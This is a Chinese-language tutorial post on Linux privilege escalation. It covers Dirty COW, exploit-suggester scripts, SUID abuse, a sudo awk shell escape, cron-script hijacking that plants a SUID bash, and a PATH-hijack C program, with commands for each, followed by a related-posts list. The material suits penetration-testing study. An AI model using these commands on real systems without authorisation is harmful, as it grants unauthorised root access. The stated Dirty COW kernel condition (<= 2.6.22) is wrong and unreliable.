linux提权参考方法
0x00 内核漏洞
00 Dirty COW(cve-2016-5195)
原理:脏牛漏洞cve-2016-5195又叫Dirty COW,Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件 (race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。
利用条件:Linux内核 <= 2.6.22
exp1:Firefart/Dirtycow: Dirty Cow 漏洞利用 - CVE-2016-5195 (github.com)
exp2: gbonacini/CVE-2016-5195:CVE-2016-5195漏洞利用示例。 (github.com)
0x01 脚本扫描
00 linux-exploit-suggester
探测系统可能存在的漏洞(存在误报)
脚本地址:mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool (github.com)
01 linux-exploit-suggester2
同上一个脚本的优化版本(需要perl环境运行)
脚本地址:jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester (github.com)
0x02 SUID提权
百度百科:SUID权限是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限。如果可以找到并运行root用户所拥有的SUID的文件,那么就可以在运行该文件的时候获得root用户权限。
00 linux命令查找SUID文件
#不同系统命令会有不同
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
-perm:匹配特殊权限 -4000表示SUID,-u=s即为查找权限为suid; -print: find命令将匹配的文件输出到标准输出 -type f类型为文件
-exec: find命令对匹配的文件执行该参数所给出的shell命令,相应的形式为:-exec command {} \;其中分号代表终止符,\是为了有时候需要转义分号,{}代表find出来的文件
ls命令: -l是使用较长格式列出信息 -d是显示目录而非内容
一般Linux可用提权文件:nmap、vim、find、bash、more、less、cp
SUID提权命令查询网站:走开垃圾箱 (gtfobins.github.io)
01 利用步骤
以find命令为例子
1、查找SUID文件
2、进行find命令提权
0x03 sudo提权
00 简介
sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。
01 sudo的特性
1、sudo的配置文件是sudoers文件,它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers,属性必须为0440。
2、sudo能够限制用户只在某台主机上运行某些命令。
3、sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。
02 利用步骤
1、查询可以进行sudo免密的命令(以awk命令作为例子)
sudo -l
2、利用awk命令进行提权
sudo awk 'BEGIN {system("/bin/sh")}'
0x04 计划任务提权
00 简介
系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。
tips:由于权限配置不当,导致我们可以成功修改cron中的任何脚本或二进制文件,那么我们可以使用root权限执行任意代码。
利用命令如下命令列出一些计划任务
ls -l /etc/cron*
cat /etc/crontab
01 利用
1、查看test.sh文件,发现为所有人都可读可写
2、添加内容到test.sh文件中
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell
3、等待计划任务被执行
4、执行shell文件,提权成功
0x05 本地环境变量提权
00 简介
执行ps会打印进程信息,执行 /tmp/ps,相当于执行bash,得到新的终端,环境变量劫持ps 就是以system 执行了bash,所以获取了root权限。
01 利用
1、编写.c文件
//demo.c#include<unistd.h>
void main()
{
setuid(0);
setgid(0);
system("ps");
}
2、编译以及执行.c文件
gcc demo.c -o shell
chmod u+s shell
cp /bin/bash /tmp/ps
export PATH=/tmp:$PATH #加入环境变量
./shell
linux提权参考方法相关推荐
- linux 提权方法总结
几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏 ...
- Linux提权方法总结
目录 内核漏洞提权 SUID提权 计划任务提权 sudo滥用提权 配置错误之利用/etc/passwd提权 当我们拿到了一台Linux服务器的低权限账号,于是,我们想要通过技术手段提权至root用户权 ...
- linux 提权一文通
目录 0x001 linux提权描述 0x002 基本Linux权限提升前的信息收集 操作系统 什么是发行类型?什么版本的? 什么是内核版本?是64位吗? 从环境变量中可以收集到什么信息?环境变量中可 ...
- Metasploit上使用RPC方式复现一个Linux提权漏洞
序 学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...
- ATTCK权限提升-Linux提权总结
ATT&CK权限提升-Linux提权总结 介绍 MITRE ATT&CK ®是一个全球可访问的基于真实世界观察的对手战术和技术知识库,本文根据MITRE ATT&CK框架总 ...
- Linux提权,吃透这篇文章就够了
0x001 linux提权描述 大多数计算机系统设计为可与多个用户一起使用.特权是指允许用户执行的操作.普通特权包括查看和编辑文件或修改系统文件.特权升级意味着用户获得他们无权获得的特权.这些特权可用 ...
- Linux提权思路+实战【很不错的文章】
Linux提权思路 前言 首先关于Linux提权我们得先明白几个概念. linux发行版本 是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux ...
- 一文吃透Linux提权
Python实战社群 Java实战社群 长按识别下方二维码,按需求添加 扫码关注添加客服 进Python社群▲ 扫码关注添加客服 进Java社群▲ 文章作者:dnsill 文章来源:https://s ...
- (建议收藏)万字长文,带你一文吃透 Linux 提权
前言 关于Linux知识,博主已经整理成专栏,感兴趣的小伙伴可自行订阅专栏 Linux疑难杂症解决指南 你的支持就是我不断更新的动力! 0x001 linux提权描述 大多数计算机系统设计为可与多个用 ...
最新文章
- AI佳作解读系列(一)——深度学习模型训练痛点及解决方法
- Android非空格式验证框架Validation的使用---第三方库学习笔记(四)
- 我们的2009 梦想照进了现实
- QT的QStringList类的使用
- linux读conf文件格式,CONF 文件扩展名: 它是什么以及如何打开它?
- 学习《apache源代码全景分析》之DSO概念
- 深入了解Java之虚拟机内存
- 牛客题霸 [二叉树的之字形层序遍历] C++题解/答案
- antlr 4.7.1_新ANTLR 4.6的重要更改
- 计算机网络 --- 局域网中的以太网
- python优雅编程_Python优雅地可视化数据
- 谷歌搜索363搜索引擎入口_SEO谷歌搜索引擎优化到底有啥好?
- 新潮科技:人工智能歌词创作软件app,在线ai作词押韵写歌词,可以自己写歌词的软件
- 求s = a + aa + aaa +aaaa +……a的值
- 第三周总结(2022.10.31~2022.11.4)
- Linux 简要大纲
- 杰理AC693N介绍
- 操作系统实验——模拟动态分区首次适应分配和回收算法
- networkx_to_metis
- [vim] 滚动屏幕快捷键记忆
热门文章
- 《深入解析Windows操作系统》安全性
- python pdf转图片 poppler_Python将PDF转成图片—PyMuPDF和pdf2image
- 360n4s普通版Android7,360手机N4S骁龙版是什么意思 360N4S骁龙版与普通版的区别有哪些...
- 电脑卡在系统logo处
- menu.ctrl.php,对pyqt5之menu和action的使用详解
- Android 快捷方式 shortcuts 使用
- Win10 下安装 MSYS2
- Android之TBS浏览Word、Excel、PPT、PDF等文件
- 如何进入/home/user/.wine
- 怎么恢复已删除的全部数据,不小心删除的数据怎么恢复,删除的文件还能找回吗